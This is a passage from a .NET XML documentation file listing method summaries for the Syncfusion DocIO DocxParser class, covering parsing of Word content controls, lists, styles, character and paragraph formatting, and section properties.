        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseSDTEndCharacterFormat(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Parse SDT end character format
            </summary>
            <param name="reader"></param>
            <param name="sdTagBlock"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseSDTContent(System.Xml.XmlReader,Syncfusion.DocIO.DLS.StructureDocumentTagBlock)">
            <summary>
            Parse SDT content
            </summary>
            <param name="reader"></param>
            <param name="sdTagBlock"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseSDTProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.SDTProperties)">
            <summary>
            Parse SDT properties
            </summary>
            <param name="reader"></param>
            <param name="sdTagBlock"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseDocPartObj(System.Xml.XmlReader,Syncfusion.DocIO.DLS.DocPartObj)">
            <summary>
            Parse Doc Part Obj
            </summary>
            <param name="reader"></param>
            <param name="docPartobj"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.parseSDTCheckBox(System.Xml.XmlReader,Syncfusion.DocIO.DLS.SDTCheckBox)">
            <summary>
            Parse Doc part obj and Doc part List child entities.
            </summary>
            <param name="reader"></param>
            <param name="sdtCheckBox"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseSDTDropDownList(System.Xml.XmlReader,Syncfusion.DocIO.DLS.SDTDropDownList)">
            <summary>
            Parse SDT Dropdown list
            </summary>
            <param name="reader"></param>
            <param name="comboBox"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseSDTComboBox(System.Xml.XmlReader,Syncfusion.DocIO.DLS.SDTComboBox)">
            <summary>
            Parse SDT combo box
            </summary>
            <param name="reader"></param>
            <param name="comboBox"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseSDTDate(System.Xml.XmlReader,Syncfusion.DocIO.DLS.SDTDate)">
            <summary>
            Parse SDT Date
            </summary>
            <param name="reader"></param>
            <param name="date"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetCalendarType(System.String)">
            <summary>
            Get calender type
            </summary>
            <param name="type"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseDocumentRelations(System.IO.Stream)">
            <summary>
            Parse Document Relations
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFontTableRelations(System.IO.Stream)">
            <summary>
            Parse FontTable Relations
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseRelations(System.Xml.XmlReader,System.Collections.Generic.Dictionary{System.String,System.Collections.DictionaryEntry})">
            <summary>
            Parses the relations.
            </summary>
            <param name="relReader">The xml reader.</param>
            <param name="relations">The relations collection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseCustomProperties(System.Xml.XmlReader)">
            <summary>
            Parse the custom document properties
            </summary>
            <param name="reader">XmlReader for custom.xml</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseCustomProperty(System.Xml.XmlReader,Syncfusion.DocIO.DLS.CustomDocumentProperties)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="customProperties"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.UpdateText(System.String)">
            <summary>
            Updates the text, that cannot be represented in Xml as defined by XML 1.0 specification.
            </summary>
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseCoreProperties(System.Xml.XmlReader)">
            <summary>
            Parse the core properties
            </summary>
            <param name="reader">XmlReader for core.xml</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseAppProperties(System.Xml.XmlReader)">
            <summary>
            Parse the extended properties
            </summary>
            <param name="reader">XmlReader for app.xml</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetAppProperty(System.String)">
            <summary>
            Parses the list.
            </summary>
            <param name="format">The format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseWord2003DocumentProperties(System.Xml.XmlReader)">
            <summary>
            Parse the document properties from Word 2003 XML document
            </summary>
            <param name="reader">XmlReader for DocumentProperties</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseWord2003CustomDocumentproperties(System.Xml.XmlReader)">
            <summary>
            Parse the custom document properties from Word 2003 XML document
            </summary>
            <param name="reader">XmlReader for CustomDocumentProperties</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseList(System.Xml.XmlReader,Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Parses the list.
            </summary>
            <param name="format">The format.</param>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.FindListStyle(Syncfusion.DocIO.DLS.WParagraphStyle)">
            <summary>
            Finds the list style.
            </summary>
            <param name="style">The style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseListFormat(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Parses the list format.
            </summary>
            <param name="reader">The reader.</param>
            <param name="format">The format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.UpdateListStyleForInvalidNumId(System.String,Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Update list style for numId which is not having specific abstract numbering definition
            </summary>
            <param name="id">NumID value</param>
            <param name="listFormat">Current listformat</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetListFormatBaseStyleName(Syncfusion.DocIO.DLS.ListStyle,System.String@)">
            <summary>
            Get Base style name of the list format
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseNumberings(System.Xml.XmlReader)">
            <summary>
            Parse the numberings
            </summary>
            <param name="reader">The xml reader</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ReplaceDefaultNsid(System.Collections.Generic.Dictionary{System.Int64,System.String})">
            <summary>
            Replace the default list style nsid value with the new random numbers
            </summary>
            <param name="nsidCollection"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseWord2003MLNumberings(System.Xml.XmlReader,System.Collections.Generic.Dictionary{System.Int64,System.String},System.Collections.Generic.Dictionary{System.String,System.Int64})">
            <summary>
            Parse Word 2003 xml numberings
            </summary>
            <param name="reader">reader</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseDocxNumberings(System.Xml.XmlReader,System.Collections.Generic.Dictionary{System.Int64,System.String},System.Collections.Generic.Dictionary{System.String,System.Int64})">
            <summary>
            Parse Word 2003 xml numberings
            </summary>
            <param name="reader">reader</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseListNum(System.Xml.XmlReader,System.Collections.Generic.Dictionary{System.Int64,System.String},System.Collections.Generic.Dictionary{System.String,System.Int64})">
            <summary>
            Parse the Num element of the numberings
            </summary>
            <param name="reader">The xml reader</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetAbstractNumID(System.Collections.Generic.Dictionary{System.Int64,System.String},System.Collections.Generic.Dictionary{System.String,System.Int64},System.String)">
            <summary>
            Get the abstract number id based  nsid.
            </summary>
            <param name="nsidCollection"></param>
            <param name="abstractNumCollection"></param>
            <param name="abstractNumId"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseLevelOverride(System.Xml.XmlReader,System.String)">
            <summary>
            Parse the level override attrbutes
            </summary>
            <param name="reader"></param>
            <param name="numId"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseLevelOverride(System.Xml.XmlReader,Syncfusion.DocIO.DLS.OverrideLevelFormat)">
            <summary>
            Parse the level override
            </summary>
            <param name="reader"></param>
            <param name="levelFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseAbstractNum(System.Xml.XmlReader,System.Collections.Generic.Dictionary{System.Int64,System.String},System.Collections.Generic.Dictionary{System.String,System.Int64})">
            <summary>
            Parse the abstract numbering element
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseListStyle(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ListStyle)">
            <summary>
            Parse the abstrat list styles
            </summary>
            <param name="reader">The xml reader</param>
            <param name="listStyle">list style</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseListLevel(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Parse the list level
            </summary>
            <param name="reader">The xml reader</param>
            <param name="level">The list level</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseLegacyProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Parses the legacy properties.
            </summary>
            <param name="reader">The reader.</param>
            <param name="level">The level.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetFollowChar(System.String)">
            <summary>
            Get the corresponding the follow char
            </summary>
            <param name="levelFollow">follow character as string</param>
            <returns>returns the level follow character</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseLevelJc(System.String)">
            <summary>
            Get the justification value
            </summary>
            <param name="justification">Justification value of type string </param>
            <returns>returns the justification value</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseLevelText(Syncfusion.DocIO.DLS.WListLevel,System.String)">
            <summary>
            Parse the list level text
            </summary>
            <param name="level"></param>
            <param name="levelText"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.CheckNumberPrefix(System.String)">
            <summary>
            Checks the number prefix.
            </summary>
            <param name="prefix">The prefix.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetLevelNumberFormat(System.String)">
            <summary>
            Gets the corresponding list pattern for the string value
            </summary>
            <param name="pattern">The list pattern value</param>
            <returns>returns the corresponding list pattern</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.UpdateListType(Syncfusion.DocIO.DLS.ListStyle)">
            <summary>
            Updates the type of the list style.
            </summary>
            <param name="listStyle">The list style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.UpdateStyleName(Syncfusion.DocIO.DLS.ListStyle)">
            <summary>
            Updates the name of the list style.
            </summary>
            <param name="listStyle">The list style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePictureBullet(System.Xml.XmlReader)">
            <summary>
            Parses the picture bullet
            </summary>
            <param name="reader">The reader</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ProcessPictureStyle(Syncfusion.DocIO.DLS.WPicture,System.String)">
            <summary>
            Process the picture style
            </summary>
            <param name="picture">The picture</param>
            <param name="size">Picture size</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseSize(System.String)">
            <summary>
            Parses the size.
            </summary>
            <param name="partString">The part string.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePictureId(System.Xml.XmlReader)">
            <summary>
            Parse/Get the picture relationship id
            </summary>
            <param name="reader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePictureBulletStyle(System.Xml.XmlReader)">
            <summary>
            parse and return the pitcure bullet style.
            </summary>
            <param name="reader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseStyles(System.Xml.XmlReader)">
            <summary>
            Parse the style part
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Parse2003XmlStyles(System.Xml.XmlReader)">
            <summary>
            Parse the styles of Word 2003 XML document
            </summary>
            <param name="reader">xml reader</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.UpdateBaseStyles">
            <summary>
            Updates the base styles.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.UpdateListInStyles">
            <summary>
            Updates the list in styles.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.UpdateLinkName(System.Collections.Generic.Dictionary{System.Int32,System.String},System.Collections.Generic.List{System.Int32})">
            <summary>
            Updates the name of the link style.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.CountOccurrencesOfValue(System.Collections.Generic.List{System.String})">
            <summary>
            Counts the occurrences of value.
            </summary>
            <param name="list">The dictionary.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseStyle(System.Xml.XmlReader,System.Collections.Generic.Dictionary{System.Int32,System.String},System.Collections.Generic.List{System.Int32})">
            <summary>
            Parse the document style
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseStyleProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.Style,System.Collections.Generic.Dictionary{System.Int32,System.String},System.Collections.Generic.List{System.Int32},System.String)">
            <summary>
            Parse the style properties
            </summary>
            <param name="reader">The reader</param>
            <param name="style">The style object</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.AddStyleNameID(Syncfusion.DocIO.DLS.Style,System.String)">
            <summary>
            Add StyleNameID into the StyleNameId collection
            </summary>
            <param name="style"></param>
            <param name="styleName"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.CreateStyle(System.String)">
            <summary>
            Creates the style.
            </summary>
            <param name="styleType">Type of the style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseLatentStyles(System.Xml.XmlReader)">
            <summary>
            Parse the latent styles
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseDocDefaults(System.Xml.XmlReader)">
            <summary>
            Parse the document defaults formattings
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetCharacterFormat(Syncfusion.DocIO.DLS.Style)">
            <summary>
            Gets the character format of style.
            </summary>
            <param name="style">The style</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetParagraphFormat(Syncfusion.DocIO.DLS.Style)">
            <summary>
            Gets the paragraph format of style.
            </summary>
            <param name="style">The style</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseConditionalFormattingStyleProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.Style)">
            <summary>
            Parses the conditional formatting style properties.
            </summary>
            <param name="reader">The reader</param>
            <param name="style">The style</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetConditionalFormattingCode(System.String)">
            <summary>
            Gets conditional formatting code.
            </summary>
            <param name="styleType">The styleType</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableStyleTableProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.TableStyleTableProperties)">
            <summary>
            Parses the table style table properties.
            </summary>
            <param name="reader">The reader</param>
            <param name="props">The props</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableStyleRowProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.TableStyleRowProperties)">
            <summary>
            Parses the table style row properties.
            </summary>
            <param name="reader">The reader</param>
            <param name="props">The props</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableStyleCellProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.TableStyleCellProperties)">
            <summary>
            Parses the table style cell properties.
            </summary>
            <param name="reader">The reader</param>
            <param name="props">The props</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseShading(System.Xml.XmlReader,Syncfusion.DocIO.DLS.TableStyleTableProperties)">
            <summary>
            Parses the shading of table style table properties.
            </summary>
            <param name="reader">The reader</param>
            <param name="props">The props</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseShading(System.Xml.XmlReader,Syncfusion.DocIO.DLS.TableStyleCellProperties)">
            <summary>
            Parses the shading of table style cell properties.
            </summary>
            <param name="reader">The reader</param>
            <param name="props">The props</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseCharacterFormat(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Parse the run properties/Character formattings
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetFloatValue(System.String,System.String)">
            <summary>
            To get the font size
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetNumericValue(System.String)">
            <summary>
            To validate for the Numeric values alone in font size
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseLigatures(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Parses the ligatures.
            </summary>
            <param name="reader">The reader.</param>
            <param name="charFormat">The char format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseNumberForm(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Parses the number form.
            </summary>
            <param name="reader">The reader.</param>
            <param name="charFormat">The char format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseNumberSpacing(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Parses the number spacing.
            </summary>
            <param name="reader">The reader.</param>
            <param name="charFormat">The char format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseStylisticSet(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Parses the stylistic set.
            </summary>
            <param name="reader">The reader.</param>
            <param name="charFormat">The char format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetStylisticSet(System.String)">
            <summary>
            Gets the stylistic set.
            </summary>
            <param name="value">The value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.UpdateUsedFontsCollection(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            
            </summary>
            <param name="charFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseChangeCharacterFormat(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="charFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseBorder(System.Xml.XmlReader,Syncfusion.DocIO.DLS.Border)">
            <summary>
            Parse the border
            </summary>
            <param name="reader"></param>
            <param name="border"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetBorderStyle(System.String,Syncfusion.DocIO.DLS.Border)">
            <summary>
            Get the border style for the corresponding string value
            </summary>
            <param name="strStyle">String value that represents the border style</param>
            <param name="border">The border</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetBorderMultiplier(Syncfusion.DocIO.DLS.Border)">
            <summary>
            Get the multiplier to find the border line width
            </summary>
            <param name="border"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseRunShading(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Parse the shading elements of run properties
            </summary>
            <param name="reader"></param>
            <param name="charFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTexture(System.String)">
            <summary>
            Returns the textureStyle for the corresponding string value
            </summary>
            <param name="textureStyle">textureStyle</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Parse2003Texture(System.String)">
            <summary>
            Returns the textureStyle for the corresponding string value
            </summary>
            <param name="textureStyle"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseVertAlign(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Parse the vertAlign property of run properties (superscript or subscript)
            </summary>
            <param name="reader"></param>
            <param name="charFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseUnderline(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Parse the underline format of run properties.
            </summary>
            <param name="reader">xml reader</param>
            <param name="charFormat">character format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Parse2003Underline(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Parse the underline format of run properties.
            </summary>
            <param name="reader"></param>
            <param name="charFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFonts(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Parse thr fonts specified on the run properties.
            </summary>
            <param name="reader"></param>
            <param name="charFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseHighlight(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Parse the highlight of the character format
            </summary>
            <param name="reader"></param>
            <param name="charFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseParagraphFormat(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Parse the default paragraph properties
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFrameSize(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Parses the size of the frame.
            </summary>
            <param name="reader">The reader.</param>
            <param name="paraFormat">The para format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFrameAnchor(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Parses the frame anchor.
            </summary>
            <param name="reader">The reader.</param>
            <param name="paraFormat">The paragraph format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFramePos(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Parses the frame position.
            </summary>
            <param name="reader">The reader.</param>
            <param name="paraFormat">The paragraph format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTabs(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="pFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetTabAlign(System.String)">
            <summary>
            Parses the tab justification.
            </summary>
            <param name="align">The alignment.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetTabLeader(System.String)">
            <summary>
            Parses the tab leader.
            </summary>
            <param name="leader">The leader.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseChangeParagraphFormat(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="paragraphFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.CheckTrackChange(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Checks the track change.
            </summary>
            <param name="item">The item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseBorders(System.Xml.XmlReader,Syncfusion.DocIO.DLS.IEntity,Syncfusion.DocIO.DLS.Borders)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="ent"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseBorder(System.Xml.XmlReader,Syncfusion.DocIO.DLS.Borders)">
            <summary>
            Parses the border.
            </summary>
            <param name="reader">The reader.</param>
            <param name="borders">The borders.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseSpacing(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Parse the paragraph spacings
            </summary>
            <param name="reader"></param>
            <param name="paragraphFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseLineSpacing(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Parse the line spacing of paragraph format
            </summary>
            <param name="reader"></param>
            <param name="paragraphFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseIndentation(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Parse the paragraph indentation.
            </summary>
            <param name="reader">The xml reader</param>
            <param name="paragraphFormat">The paragraph format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseParagraph2003Justification(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Parse the justification
            </summary>
            <param name="reader"></param>
            <param name="paragraphFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseParagraphJustification(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Parse the justification
            </summary>
            <param name="reader"></param>
            <param name="paragraphFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseShading(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Parse the shading.
            </summary>
            <param name="pFormat"></param>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseSectionProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Parse the section properties
            </summary>
            <param name="reader">The XmlReader</param>
            <param name="section">The section</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseHeaderFooter(Syncfusion.DocIO.DLS.WHeadersFooters,System.Xml.XmlReader,System.String,System.Boolean)">
            <summary>
            To Parse Header/Footer
            </summary>
            <param name="headerfooter">headerfooter</param>
            <param name="reader">reader</param>
            <param name="type">type</param>
            <param name="isHeader">isHeader</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseHeaderFooter(Syncfusion.DocIO.DLS.WHeadersFooters,Syncfusion.DocIO.DLS.Part,System.String,System.Boolean)">
            <summary>
            Parses the header footer.
            </summary>
            <param name="hf">The hf.</param>
            <param name="part">The part.</param>
            <param name="type">The type.</param>
            <param name="isHeader">if it is header, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFootnoteProp(System.Xml.XmlReader,System.Boolean,Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Parses the footnote and endnote property.
            </summary>
            <param name="reader">The reader.</param>
            <param name="isFootnote">Boolean value specifies whether the element is Footnote or Endnote.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFootnoteNumberStart(System.Xml.XmlReader,System.Boolean,Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Parses the footnote endnote number start.
            </summary>
            <param name="reader">The reader.</param>
            <param name="isFootnote">if it is footnote, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Parse2003FootnoteNumFormat(System.Xml.XmlReader,System.Boolean,Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Parses the2003 footnote endnote number format.
            </summary>
            <param name="reader">The reader.</param>
            <param name="isFootnote">if it is footnote, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFootnoteNumFormat(System.Xml.XmlReader,System.Boolean,Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Parses the footnote endnote number format.
            </summary>
            <param name="reader">The reader.</param>
            <param name="isFootnote">if it is footnote, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFootnoteNumRestart(System.Xml.XmlReader,System.Boolean,Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Parses the footnote endnote number restart.
            </summary>
            <param name="reader">The reader.</param>
